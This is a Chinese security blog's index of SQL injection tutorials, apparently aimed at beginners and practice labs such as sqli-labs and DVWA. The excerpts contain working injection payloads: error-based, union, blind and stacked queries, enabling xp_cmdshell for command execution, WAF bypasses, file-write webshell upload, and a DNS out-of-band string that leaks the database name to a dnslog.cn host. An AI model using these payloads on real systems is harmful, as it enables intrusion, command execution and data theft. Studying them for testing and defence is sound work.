数据库基础与注入
mysql数据库知识
admin-r꯭o꯭ot꯭
个人公众号:爱国小白帽
推送技术原创及好用的安全工具
因为我也是小白所以文章没啥深度,很适合小白学习,有问题可以一起探讨哦
展开
-
SQL注入篇——SqlServer的报错注入
一、获取当前的数据库使用函数db_name()id=1 and 1=convert(int,(select top 1 db_name()))二、获取当前数据库的表将获取到的数据库名与.sys.sysobjects拼接id=1 and 1= convert(int,(select top 1 name FROM text.sys.sysobjects where xtype = 'U...原创 2020-02-12 23:30:43 · 3265 阅读 · 4 评论 -
SQL注入篇——SqlServer的联合查询注入
sqlserver 常用系统函数:suser_name() 用户登录名user_name() 用户在数据库中的名字user 用户在数据库中的名字show_role() 对当前用户起作用的规则db_name() 数据库名object_name(obj_id) 数据库对象名col_name(obj_id,col_id) 列名col_length(objname,colname) 列长...原创 2020-02-12 23:09:43 · 1346 阅读 · 0 评论 -
SQL注入篇——利用SqlServer执行系统命令连接远程桌面
我们用到的函数是xp_cmdshell 利用此存储过程可以直接执行系统命令。一、确立连接输入IP+/1.php?id=1出现如下界面说明连接成功二、使用master表开启xp_cmdshell服务输入下列语句开启服务:?id=1;use master;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC ...原创 2020-02-12 22:20:47 · 2511 阅读 · 0 评论 -
解决各种80端口占用Apache启动不了的问题,win10,win2003均可附带远程桌面教程
????????????☝????????如果这都解决不了给我写信Apache不能正常开启如图Apache开启失败:方案一:查看端口是否被占用键盘Win+R打开命令行窗口、输入cmd打开终端输入:netstat -ano|findstr "80"然后输入:Tasklist |findstr 进程号杀死占用进程然后重启PHPstudy。方案二:查看本地服务设置键盘Win+R打开命令行窗口、输入servic...原创 2020-02-12 14:36:08 · 983 阅读 · 2 评论 -
SQL注入篇——WAf绕过
WAF是什么?Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。Waf分类代码WAF软件WAF硬件WAF云WAFSql注入绕waf常用方式大小写混合 uNIoN sELecT 1,2,3,42...原创 2020-02-11 22:04:48 · 1615 阅读 · 2 评论 -
SQL注入篇——堆叠注入
堆叠注入能同时执行多条语句注入语句:id=1;CREATE DATABASE sq default charset utf8; -- -查询id为1的用户名密码,同时创建名为sq的数据库。数据库创建成功,说明两条语句都执行了。...原创 2020-02-10 22:27:17 · 947 阅读 · 0 评论 -
SQL注入篇——文件读写注入
文件读写注入的原理就是利用文件的读写权限进行注入文件读写注入的条件1、读写文件需要secure_file_priv权限secure_file_priv=代表对文件读写没有限制2.secure_file_priv=NULL代表不能进行文件读写secure_file_priv=d:/phpstudy/mysql/data代表只能对该路径下文件进行读写2、知道网站绝对路径Wi...原创 2020-02-10 21:34:27 · 4022 阅读 · 2 评论 -
SQL注入篇——dns回显注入
dns回显注入的使用场景当目标无显示位也无错误回显时便可使用此方法1、首先使用网站http://www.dnslog.cn/点击此处获取dns地址2、将获取到的地址复制填入SQL语句中执行注意:每次获取到的dns地址都不同,改变时替换注入语句中标红部分即可注入语句:id=1’ and load_file(concat("\\",(database()),".2bmfvu.dnslo...原创 2020-02-10 20:52:13 · 1949 阅读 · 0 评论 -
SQL注入篇——二次注入
二次注入原理二次注入是利用已存储的用户数据读取后再次进入到 SQL 查询语句中导致的注入。????????????☝????????有疑问欢迎写信哦二次注入分为四步:确定攻击目标账户名注册恶意账户修改恶意账户密码使用修改的密码登录目标账户假设知道有admin用户但不知道密码1、首先点击New User click here? 注册admin' -- -用户2、然后登录该用户修改密码3、然后再...原创 2020-02-10 20:33:56 · 3774 阅读 · 2 评论 -
SQL注入篇——sqlmap安装使用详解
SQL注入篇——注入工具sqlmap使用详解sqlmap简介sqlmap是一个开源的渗透测试工具,它自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。sqlmap功能全力支持MySQL、Oracle、PostgreSQL、Microsof...原创 2020-01-25 11:26:00 · 6966 阅读 · 3 评论 -
SQL注入篇——less21-38最详细教程附带隐藏关卡
sql注入基本语句:order by 4 判断有多少列union select 1,2,3 判断数据显示点union select 1,user(),database() 显示出登录用户和数据库名union select 1,(select group_concat(table_name) from information_schema.tables wh...原创 2020-01-12 14:56:00 · 1968 阅读 · 1 评论 -
SQL注入篇——sqli-labs最详细1-40闯关指南
使用sqlilabs游戏系统进行sql注入1.首先确定用哪些字符可以进行sql注入一.选择Less1进入第一关,在网址中添加标红内容,显示了用户和密码http://localhost/sqlilabsmaster/Less1/index.php?id=1’ and 1=1 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入二.进入第二关,在网址中添...原创 2020-01-11 00:37:15 · 37563 阅读 · 11 评论 -
SQL注入篇——宽字节注入
注入语句:%DF’ – -原创 2020-01-09 11:59:11 · 1308 阅读 · 2 评论 -
SQL注入篇——一句话木马
一、利用sql注入上传一句话木马成功验证二、利用dns报错回显查看数据三、利用dns报错回显数据返回数据库名的注入语句1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – -...原创 2020-01-08 20:08:22 · 6140 阅读 · 3 评论 -
SQL注入篇——盲注
盲注之布尔类型注入DVWA平台low级别一、判断数据库名的长度1’ and (length(database()))>4#超出长度会报错二、获取数据库名的字符判断每个字母在ASCII码中的范围,最终确定是哪个字母1’ and (ascii(substr(database(),n,1)))>66#三、获取数据库表名(先获取表名数量,再获取表名长度)1' and (...原创 2020-01-08 00:12:31 · 1214 阅读 · 1 评论 -
SQL注入篇——对information_schema数据库的解析
information_schema数据库是个临时数据库,里面的一些信息是随时改变的其中重要的表有:SCHEMATA表---SCHEMATA表提供了所有数据库的信息。select schema_name from information_schema.schemata;列出所有数据库——效果等同于show databases;TABLES表---TABLES表提供了关于数据库中的表的...原创 2020-01-07 13:09:21 · 1913 阅读 · 1 评论 -
SQL注入篇——mysql 联合查询注入
SQL注入篇——对information_schema数据库的解析SQL注入篇——盲注SQL注入篇——常用注入语句SQL注入篇——宽字节注入SQL注入篇——less21-38最详细教程附带隐藏关卡SQL注入篇——sqli-labs最详细1-75闯关指南SQL注入篇——注入工具sqlmap使用详解sql注入中的常用函数@@datadir 函数作用:返回数据库的存储目...原创 2020-01-06 21:57:30 · 1823 阅读 · 2 评论